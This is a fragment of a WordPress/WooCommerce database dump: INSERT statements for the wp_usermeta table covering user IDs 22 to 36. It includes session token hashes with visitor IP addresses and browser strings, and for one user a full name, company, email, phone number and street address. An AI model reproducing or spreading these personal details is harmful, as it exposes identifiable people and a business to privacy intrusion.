INSERT INTO `wp_usermeta` VALUES (542, 22, 'session_tokens', 'a:1:{s:64:"d2ee8b9bc08250c9f4770c10ee8b64a4d0f9d55a232e48eff79a87d3b0c63843";a:4:{s:10:"expiration";i:1476418977;s:2:"ip";s:13:"10.196.94.115";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36";s:5:"login";i:1475209377;}}'); 
INSERT INTO `wp_usermeta` VALUES (543, 23, 'nickname', 'michael.zurek'); 
INSERT INTO `wp_usermeta` VALUES (544, 23, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (545, 23, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (546, 23, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (547, 23, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (548, 23, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (549, 23, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (550, 23, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (551, 23, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (552, 23, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (553, 23, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (554, 23, '_yoast_wpseo_profile_updated', '1475241950'); 
INSERT INTO `wp_usermeta` VALUES (555, 23, 'session_tokens', 'a:1:{s:64:"26f188fc1bcb4b7df8314fa06a6afe57a8cf260b0c90ff49405c54cb368db68d";a:4:{s:10:"expiration";i:1476451550;s:2:"ip";s:14:"104.245.210.36";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1475241950;}}'); 
INSERT INTO `wp_usermeta` VALUES (556, 24, 'nickname', 'michael.b.taylor1'); 
INSERT INTO `wp_usermeta` VALUES (557, 24, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (558, 24, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (559, 24, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (560, 24, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (561, 24, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (562, 24, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (563, 24, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (564, 24, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (565, 24, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (566, 24, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (567, 24, '_yoast_wpseo_profile_updated', '1475258154'); 
INSERT INTO `wp_usermeta` VALUES (568, 24, 'session_tokens', 'a:1:{s:64:"f9293fbb7f8efe0588472e9bbd81cdb8036563b8f052b185bb2c6ffb3db4ff4b";a:4:{s:10:"expiration";i:1476467159;s:2:"ip";s:12:"138.162.0.42";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475257559;}}'); 
INSERT INTO `wp_usermeta` VALUES (569, 24, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (570, 24, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (571, 24, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (572, 24, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (573, 24, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (574, 24, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (575, 24, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (576, 24, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (577, 24, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (578, 24, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (579, 24, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (580, 24, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (581, 24, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (582, 24, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (583, 24, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (584, 24, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (585, 24, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (586, 24, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (587, 24, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (588, 24, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (589, 24, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (590, 24, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (591, 24, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (592, 24, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (593, 24, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (594, 24, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (595, 24, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (596, 24, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (597, 24, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (598, 24, 'last_update', '1475258154'); 
INSERT INTO `wp_usermeta` VALUES (599, 25, 'nickname', 'CA Sales'); 
INSERT INTO `wp_usermeta` VALUES (600, 25, 'first_name', 'Diane'); 
INSERT INTO `wp_usermeta` VALUES (601, 25, 'last_name', 'Bonfert'); 
INSERT INTO `wp_usermeta` VALUES (602, 25, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (603, 25, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (604, 25, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (605, 25, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (606, 25, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (607, 25, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (608, 25, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (609, 25, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (610, 25, '_yoast_wpseo_profile_updated', '1475259212'); 
INSERT INTO `wp_usermeta` VALUES (611, 25, 'dismissed_wp_pointers', ''); 
INSERT INTO `wp_usermeta` VALUES (612, 25, 'session_tokens', 'a:4:{s:64:"49b7f428b615d09117135ab35106bb08d194dc8860151567b650d3f9c536d9e7";a:4:{s:10:"expiration";i:1503593865;s:2:"ip";s:14:"47.138.209.183";s:2:"ua";s:128:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1502384265;}s:64:"b2fe225704fc2d9cac71b1ec21f49fb13720e795b692652273c601c3be8fff16";a:4:{s:10:"expiration";i:1503950925;s:2:"ip";s:14:"47.138.209.183";s:2:"ua";s:129:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063";s:5:"login";i:1502741325;}s:64:"3a4297efb35c5ac657663bdf5ebee5d9179f6154f98343237723c6aa57368ced";a:4:{s:10:"expiration";i:1504034155;s:2:"ip";s:14:"47.138.209.183";s:2:"ua";s:129:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063";s:5:"login";i:1502824555;}s:64:"19efd7636f73810c605e8b3f405d42c44b3a3297bacc8bd9843ddbda2e22a26d";a:4:{s:10:"expiration";i:1503514547;s:2:"ip";s:14:"47.138.209.183";s:2:"ua";s:129:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063";s:5:"login";i:1503341747;}}'); 
INSERT INTO `wp_usermeta` VALUES (613, 26, 'nickname', 'Leah'); 
INSERT INTO `wp_usermeta` VALUES (614, 26, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (615, 26, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (616, 26, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (617, 26, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (618, 26, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (619, 26, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (620, 26, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (621, 26, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (622, 26, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (623, 26, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (624, 26, '_yoast_wpseo_profile_updated', '1475469144'); 
INSERT INTO `wp_usermeta` VALUES (626, 1, 'manageedit-nf_subcolumnshidden', 'a:2:{i:0;s:14:"form_1_field_3";i:1;s:8:"ridwpaid";}'); 
INSERT INTO `wp_usermeta` VALUES (627, 2, 'manageedit-nf_subcolumnshidden', 'a:10:{i:0;s:16:"form_18_field_45";i:1;s:16:"form_18_field_46";i:2;s:16:"form_18_field_49";i:3;s:16:"form_18_field_47";i:4;s:16:"form_18_field_48";i:5;s:16:"form_18_field_37";i:6;s:16:"form_18_field_38";i:7;s:16:"form_18_field_39";i:8;s:16:"form_18_field_44";i:9;s:8:"ridwpaid";}'); 
INSERT INTO `wp_usermeta` VALUES (628, 27, 'nickname', 'brian.guffy'); 
INSERT INTO `wp_usermeta` VALUES (629, 27, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (630, 27, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (631, 27, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (632, 27, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (633, 27, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (634, 27, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (635, 27, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (636, 27, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (637, 27, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (638, 27, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (639, 27, '_yoast_wpseo_profile_updated', '1475513602'); 
INSERT INTO `wp_usermeta` VALUES (640, 27, 'session_tokens', 'a:2:{s:64:"fe6165e09883406ff8854ec8af7e62d3c2099e341008b62d515fcdd82b897181";a:4:{s:10:"expiration";i:1476723202;s:2:"ip";s:13:"147.165.25.16";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475513602;}s:64:"765cd8be68ca9d1a5f5e91edc4ec9e6931ea324e61e5d2510a0d84897991b734";a:4:{s:10:"expiration";i:1475686427;s:2:"ip";s:13:"147.165.25.16";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475513627;}}'); 
INSERT INTO `wp_usermeta` VALUES (641, 28, 'nickname', 'leslieu'); 
INSERT INTO `wp_usermeta` VALUES (642, 28, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (643, 28, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (644, 28, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (645, 28, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (646, 28, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (647, 28, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (648, 28, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (649, 28, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (650, 28, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (651, 28, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (652, 28, '_yoast_wpseo_profile_updated', '1475519755'); 
INSERT INTO `wp_usermeta` VALUES (654, 28, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (656, 29, 'nickname', 'trishas'); 
INSERT INTO `wp_usermeta` VALUES (657, 29, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (658, 29, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (659, 29, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (660, 29, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (661, 29, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (662, 29, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (663, 29, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (664, 29, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (665, 29, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (666, 29, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (667, 29, '_yoast_wpseo_profile_updated', '1475523211'); 
INSERT INTO `wp_usermeta` VALUES (668, 29, 'session_tokens', 'a:1:{s:64:"3a3aabe9e08057f260fe38c02f4fdcb76b14b8bb92fef6d68d5e7d9bca38c346";a:4:{s:10:"expiration";i:1476732811;s:2:"ip";s:12:"72.38.242.26";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0";s:5:"login";i:1475523211;}}'); 
INSERT INTO `wp_usermeta` VALUES (670, 30, 'nickname', 'thite'); 
INSERT INTO `wp_usermeta` VALUES (671, 30, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (672, 30, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (673, 30, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (674, 30, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (675, 30, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (676, 30, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (677, 30, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (678, 30, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (679, 30, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (680, 30, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (681, 30, '_yoast_wpseo_profile_updated', '1475524708'); 
INSERT INTO `wp_usermeta` VALUES (682, 30, 'session_tokens', 'a:1:{s:64:"c06a14ea49e59b262bb6e4b3507ca0efa6ba9394d826fcbf6b62342b2ed82bfe";a:4:{s:10:"expiration";i:1476734309;s:2:"ip";s:13:"99.10.219.124";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36";s:5:"login";i:1475524709;}}'); 
INSERT INTO `wp_usermeta` VALUES (683, 30, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (684, 31, 'nickname', 'rwilliams'); 
INSERT INTO `wp_usermeta` VALUES (685, 31, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (686, 31, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (687, 31, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (688, 31, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (689, 31, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (690, 31, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (691, 31, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (692, 31, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (693, 31, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (694, 31, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (695, 31, '_yoast_wpseo_profile_updated', '1475527976'); 
INSERT INTO `wp_usermeta` VALUES (696, 31, 'session_tokens', 'a:1:{s:64:"189d5ee34bf752d70bd480c645d4da5eded03f5cc2c2e8595560b95f7125e0d4";a:4:{s:10:"expiration";i:1476737576;s:2:"ip";s:14:"174.47.212.222";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36";s:5:"login";i:1475527976;}}'); 
INSERT INTO `wp_usermeta` VALUES (697, 31, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (698, 32, 'nickname', 'mark.t.fletcher'); 
INSERT INTO `wp_usermeta` VALUES (699, 32, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (700, 32, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (701, 32, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (702, 32, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (703, 32, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (704, 32, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (705, 32, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (706, 32, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (707, 32, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (708, 32, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (709, 32, '_yoast_wpseo_profile_updated', '1475528753'); 
INSERT INTO `wp_usermeta` VALUES (711, 32, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (712, 33, 'nickname', 'sales'); 
INSERT INTO `wp_usermeta` VALUES (713, 33, 'first_name', 'JONGBOG'); 
INSERT INTO `wp_usermeta` VALUES (714, 33, 'last_name', 'KIM'); 
INSERT INTO `wp_usermeta` VALUES (715, 33, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (716, 33, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (717, 33, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (718, 33, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (719, 33, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (720, 33, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (721, 33, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (722, 33, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (723, 33, '_yoast_wpseo_profile_updated', '1476440327'); 
INSERT INTO `wp_usermeta` VALUES (724, 33, 'session_tokens', 'a:1:{s:64:"53d7070205839b27c83b0d8c988576a22ae6313a6ce3522527ee55668aa03733";a:4:{s:10:"expiration";i:1499383949;s:2:"ip";s:12:"14.36.156.26";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1499211149;}}'); 
INSERT INTO `wp_usermeta` VALUES (725, 33, 'billing_first_name', 'JONGBOG'); 
INSERT INTO `wp_usermeta` VALUES (726, 33, 'billing_last_name', 'KIM'); 
INSERT INTO `wp_usermeta` VALUES (727, 33, 'billing_company', 'ZUNGCHEM LIMITED'); 
INSERT INTO `wp_usermeta` VALUES (728, 33, 'billing_email', 'sales@zungchem.com'); 
INSERT INTO `wp_usermeta` VALUES (729, 33, 'billing_phone', '+82-10-3613-8068'); 
INSERT INTO `wp_usermeta` VALUES (730, 33, 'billing_country', 'KR'); 
INSERT INTO `wp_usermeta` VALUES (731, 33, 'billing_address_1', 'B-1405. GWANGMYUNG SK TECHNOPARK'); 
INSERT INTO `wp_usermeta` VALUES (732, 33, 'billing_address_2', 'HAAN-RO 60'); 
INSERT INTO `wp_usermeta` VALUES (733, 33, 'billing_city', 'GWANGMYUNG-SI, GYUNGGI-DO, SOUTH KOREA'); 
INSERT INTO `wp_usermeta` VALUES (734, 33, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (735, 33, 'billing_postcode', '14322'); 
INSERT INTO `wp_usermeta` VALUES (736, 33, 'last_update', '1476440327'); 
INSERT INTO `wp_usermeta` VALUES (737, 34, 'nickname', 'ilsales'); 
INSERT INTO `wp_usermeta` VALUES (738, 34, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (739, 34, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (740, 34, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (741, 34, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (742, 34, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (743, 34, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (744, 34, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (745, 34, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (746, 34, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (747, 34, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (748, 34, '_yoast_wpseo_profile_updated', '1483719385'); 
INSERT INTO `wp_usermeta` VALUES (751, 35, 'nickname', 'info'); 
INSERT INTO `wp_usermeta` VALUES (752, 35, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (753, 35, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (754, 35, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (755, 35, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (756, 35, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (757, 35, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (758, 35, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (759, 35, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (760, 35, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (761, 35, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (762, 35, '_yoast_wpseo_profile_updated', '1475601247'); 
INSERT INTO `wp_usermeta` VALUES (764, 36, 'nickname', 'jim'); 
INSERT INTO `wp_usermeta` VALUES (765, 36, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (766, 36, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (767, 36, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (768, 36, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (769, 36, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (770, 36, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (771, 36, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (772, 36, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (773, 36, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (774, 36, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (775, 36, '_yoast_wpseo_profile_updated', '1475599627'); 
INSERT INTO `wp_usermeta` VALUES (776, 36, 'session_tokens', 'a:1:{s:64:"82da2bf72f71712057f9047e759ef947212837444748b37c8e42a2319b4d2fc2";a:4:{s:10:"expiration";i:1476809228;s:2:"ip";s:14:"136.237.60.175";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475599628;}}'); 
INSERT INTO `wp_usermeta` VALUES (777, 36, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (780, 34, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (781, 34, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (782, 34, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (783, 34, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (784, 34, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (785, 34, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (786, 34, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (787, 34, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (788, 34, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (789, 34, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (790, 34, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (791, 34, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (792, 34, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (793, 34, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (794, 34, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (795, 34, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (796, 34, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (797, 34, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (798, 34, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (799, 34, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (800, 34, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (801, 34, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (802, 34, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (803, 34, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (804, 34, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (805, 34, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (806, 34, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (807, 34, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (808, 34, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (809, 34, 'last_update', '1483719385'); 
INSERT INTO `wp_usermeta` VALUES (810, 35, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (811, 35, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (812, 35, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (813, 35, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (814, 35, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (815, 35, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (816, 35, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (817, 35, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (818, 35, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (819, 35, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (820, 35, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (821, 35, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (822, 35, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (823, 35, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (824, 35, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (825, 35, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (826, 35, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (827, 35, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (828, 35, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (829, 35, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (830, 35, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (831, 35, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (832, 35, 'shipping_city', ''); 
